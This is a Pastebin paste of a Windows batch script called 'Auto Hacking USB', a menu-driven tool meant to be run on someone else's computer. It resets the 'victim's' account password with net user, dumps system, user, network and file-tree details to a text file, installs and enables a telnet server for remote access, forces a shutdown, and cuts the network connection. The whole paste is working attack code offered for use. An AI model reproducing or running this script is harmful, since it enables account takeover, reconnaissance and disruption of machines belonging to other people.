Guest User

Untitled

a guest
Jan 20th, 2017
58
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.09 KB | None | 0 0
  1. @echo off
  2. title Auto Hacking USB ~~ Ashton is a Nerd
  3. :starthere
  4. echo What would you like to do today?
  5. echo 0) Removes user password
  6. echo 1) Get info about the computer. Stored under System_Info.txt
  7. echo 2) Turn on telnet (GREAT for lan connection from another computer)
  8. echo 3) Shutdown computer with message
  9. echo 4) Disconnect from internet and make it hard to turn back on
  10. echo 5) Reconnect to internet after hard disconnect
  11. echo U) Check for updates
  12. set /p choice=
  13. if %choice% == 0 goto :cp
  14. if %choice% == 1 goto :gi
  15. if %choice% == 2 goto :et
  16. if %choice% == 3 goto :swm
  17. if %choice% == 4 goto :dci
  18. if %choice% == 5 goto :rci
  19. if %choice% == U goto :upd
  20. if %choice% == u goto :upd
  21. cls
  22. :cp
  23. echo ....
  24. goto :check_Permissions
  25. :cp1
  26. net user
  27. echo Which one of these is the victims user name?
  28. set /p user=
  29. echo What do you want to change the password to?
  30. set /p pass=
  31. net user %user% %pass%
  32. echo The password for %user% has been changed to %pass% succefully!
  33. pause
  34. cls
  35. goto :starthere
  36. :gi
  37. cls
  38. echo Gettings tons of info from the computer. Will be stored in System_Info.txt. This may take a few seconds...
  39. pause
  40. echo IP Configuration: >> System_Info.txt
  41. ipconfig /all >> System_Info.txt
  42. echo Complete File Structure: >> System_Info.txt
  43. tree /f >> System_Info.txt
  44. echo All Users on computer: >> System_Info.txt
  45. net user >> System_Info.txt
  46. echo Computers connected to network: >> System_Info.txt
  47. net view >> System_Info.txt
  48. echo Hardware and other system info: >> System_Info.txt
  49. systeminfo >> System_Info.txt
  50. ping localhost -n 5>null
  51. cls
  52. echo Files successfully outputted to System_Info.txt
  53. goto :starthere
  54. :et
  55. pkgmgr /iu:”TelnetClient”
  56. pkgmgr /iu:”TelnetServer”
  57. echo Telnet now enabled.
  58. ping localhost -n 2 >null
  59. ipconfig
  60. cls
  61. goto :starthere
  62. cls
  63. :swm
  64. echo How long would you like to wait until it shutdown?
  65. set /p time=
  66. echo Ok. What would you like the message to say?
  67. set /p message=
  68. shutdown -s -t %time% -c "%message%"
  69. echo To abort do command shutdown -a
  70. cls
  71. goto :starthere
  72. :dci
  73. echo Disconnecting from the internet...
  74. ipconfig /release *Con*
  75. echo Making it hard to re-enabled
  76. ping localhost -n 4 >null
  77. echo Internet is no longer working to re enable choose option 5.
  78. pause
  79. cls
  80. goto :starthere
  81. :rci
  82. echo Reverting settings....
  83. ping localhost -n 3 >null
  84. echo Restarting adapter
  85. ipconfig /renew
  86. echo Internet has been reconnected
  87. pause
  88. cls
  89. goto :starthere
  90. :check_Permissions
  91. cls
  92. echo For this to work you have to run as administrator. Detecting Permissions...
  93. ping localhost -n 4 >null
  94. net session >nul 2>&1
  95. if %errorLevel% == 0 (
  96. cls
  97. echo Success: Administrative permissions confirmed....
  98. goto :cp1
  99. ) else (
  100. cls
  101. echo Administrator check failed. Please close and reopen as administrator.
  102. pause
  103. goto eos
  104. )
  105. :upd
  106. echo You are currently running version 3.0.
  107. echo Were going to launch the repository where new versions are stored
  108. echo If any of the commits are higher then 3.0 you need to update!
  109. start https://github.com/rossepsteini/Auto-Hacking-USB
  110. echo Download the zip and replace the new files with the old.
  111. pause
  112. goto :starthere
Add Comment
Please, Sign In to add comment